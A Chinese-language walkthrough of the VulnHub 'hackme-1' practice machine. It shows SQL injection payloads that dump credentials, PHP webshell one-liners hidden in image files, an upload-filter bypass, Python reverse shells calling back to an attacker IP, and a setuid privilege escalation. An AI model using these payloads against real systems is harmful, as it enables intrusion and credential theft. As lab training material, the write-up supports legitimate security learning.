靶機hackme-1的目錄
- 0x01靶機描述
- 0x02環境搭建
- 0x03靶機滲透
- 一、 資訊收集
- 二、 漏洞挖掘
- SQL注入
- 檔案上傳漏洞
- 三、 漏洞利用
- 反彈shell方法一:一句話木馬,蟻劍連接
- 反彈shell方法二:system命令執行
- 四、 提權
- 0x04實驗總結
0x01靶機描述
靶機基本資訊:
| 鏈接 | https://www.vulnhub.com/entry/hackme-1,330/ |
|---|---|
| 發布時間 | 18 Jul 2019 |
| 作者 | x4bx54 |
| 難度 | 簡單 |
靶機基本介紹:

“hackme”是一個初學者難度等級框,目標是通過web漏洞獲得有限的權限訪問,然后權限升級為root,這個實驗室是為了模擬現實生活環境而創建的,
“hackme”使用DHCP,并且在mysqld可能自行關閉的情況下(非常罕見的情況),嘗試強制重新啟動機器,然后機器應該可以正常作業,
與VMware相比,VirtualBox的效果更好
0x02環境搭建
-
下載并匯入靶機
打開vmware–檔案–打開–hackme.ova


-
查看網路配接器
將靶機網路配接器改為NAT模式

-
啟動靶機
點擊 ?靶機,開啟成功

0x03靶機滲透
一、 資訊收集
- 主機發現
arpscan -l

- 埠掃描
masscan --rate=100000 -p 0-65535 192.168.30.207

- 詳細掃描
nmap -T4 -sV -O -p 22,80 192.168.30.207

- 目錄掃描
(1) dirb目錄掃描
dirb http://192.168.30.207 /usr/share/dirb/wordlists/big.txt

(2)gobuster目錄掃描
gobuster dir -e -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,zip,html -u http://192.168.30.207 -t 30

- 網站指紋識別
whatweb http://192.168.30.207

二、 漏洞挖掘
-
SQL注入
-
登錄主頁發現登錄頁面,而且還可以注冊用戶

-
注冊用戶admin 密碼123456

-
登錄admin用戶

單擊search可以進行查看到很多的書名

-
驗證sql注入
Windows OS' and 1=1#

Windows OS' and 1=2#

由以上驗證出此處存在字符型(單引號)sql注入
- 判斷欄位數
Windows OS' order by 3#

Windows OS' order by 4#

可以看出這里欄位數為3
- 判斷顯示位置
-1' union select 1,2,3#

- 查看當前資料庫
-1' union select database(),2,3#

- 查看webapphacking庫所有的表
-1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema='webapphacking'#

- 查看users表中所有的列
-1' union select group_concat(column_name),2,3 from information_schema.columns where table_name='users'#

10.查看表中user,password
-1' union select group_concat(user),group_concat(pasword),3 from users#

- 將得到密碼進行MD5解密
user1 5d41402abc4b2a76b9719d911017c592 hello
user2 6269c4f71a55b24bad0f0267d9be5508 commando
user3 0f359740bd1cda994f8b55330c86d845 p@ssw0rd
test 05a671c66aefea124cc08b76ea6d30bb testtest
superadmin 2386acb2cf356944177746fc92523983 Uncrackable
test1 05a671c66aefea124cc08b76ea6d30bb testtest
admin e10adc3949ba59abbe56e057f20f883e 123456
123456 e10adc3949ba59abbe56e057f20f883e 123456



這里只截了三張圖,其他的解密也一樣,后面兩個用戶(admin,123456)是我自己剛剛在網頁注冊的
-
檔案上傳漏洞
-
使用superadmin用戶登錄

-
發現檔案上傳點

- 上傳phpinfo()進行驗證
制作假圖片頭
GIF89a<?php phpinfo(); ?>

上傳前先開啟burp抓包


- 攔截-修改后綴-send,我們可以從回包中看出檔案已將上傳至檔案夾

- 資訊收集時,目錄掃描出的路徑
http://192.168.30.207/uploads/
訪問路徑
http://192.168.30.207/uploads/phpinfo.php

該上傳點存在檔案上傳漏洞,并且假圖片頭與圖片馬均可以
三、 漏洞利用
反彈shell方法一:一句話木馬,蟻劍連接
- 制作圖片馬
<?php @eval($_POST[shell]); ?>

copy a.jpg/b + tu.php/a b.jpg

-
同上面上傳phpinfo.jpg一樣,上傳圖片馬
抓包–修改后綴–發送,可以看出上傳成功

-
訪問上傳的圖片馬
http://192.168.30.207/uploads/b.php

- 蟻劍連接成功


5. 上傳反彈shell腳本
將反彈shell放在網站根目錄下,開啟http服務
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.30.182",1234))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/bash","-i"])
service apache2 start

- 在蟻劍終端上下載
wget http://192.168.30.182/shell.py

-
kali監聽1234埠

-
運行

-
反彈shell成功

反彈shell方法二:system命令執行
- 制作圖片馬
<?php @system($_GET([cmd]);?>

合成圖片馬(與方法一合成方法相同)
copy a.jpg/b + sysexec.php/a sysexec3.jpg
- 同上面上傳phpinfo.jpg一樣,上傳圖片馬
抓包–修改后綴–發送,可以看出上傳成功

- kali開啟監聽7777埠
nc -vnlp 7777

- 在瀏覽器借助hackbar進行訪問上傳上去的反彈shell腳本
http://192.168.30.207/uploads/stsexec3.php?cmd=python -c 'import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("192.168.30.182",7777));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/bash","-i"])'

5. 反彈shell成功

四、 提權
- 識別所存在的用戶
cat /etc/passwd | grep /bin/bash

- 在/home/legacy路徑下發現二進制檔案touchmenot,執行二進制檔案
./touchmenot

提權成功
0x04實驗總結
這個靶機考察了目錄搜集,sql注入,檔案上傳漏洞,反彈shell等內容,在滲透的程序中需要靈活應對每一個環節,靶機難度比較簡單
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/297769.html
標籤:其他
上一篇:ctfshow-網路迷蹤-初學乍練( 離譜! 一張圖判斷飛機的目的地?)
下一篇:house of pig詳解
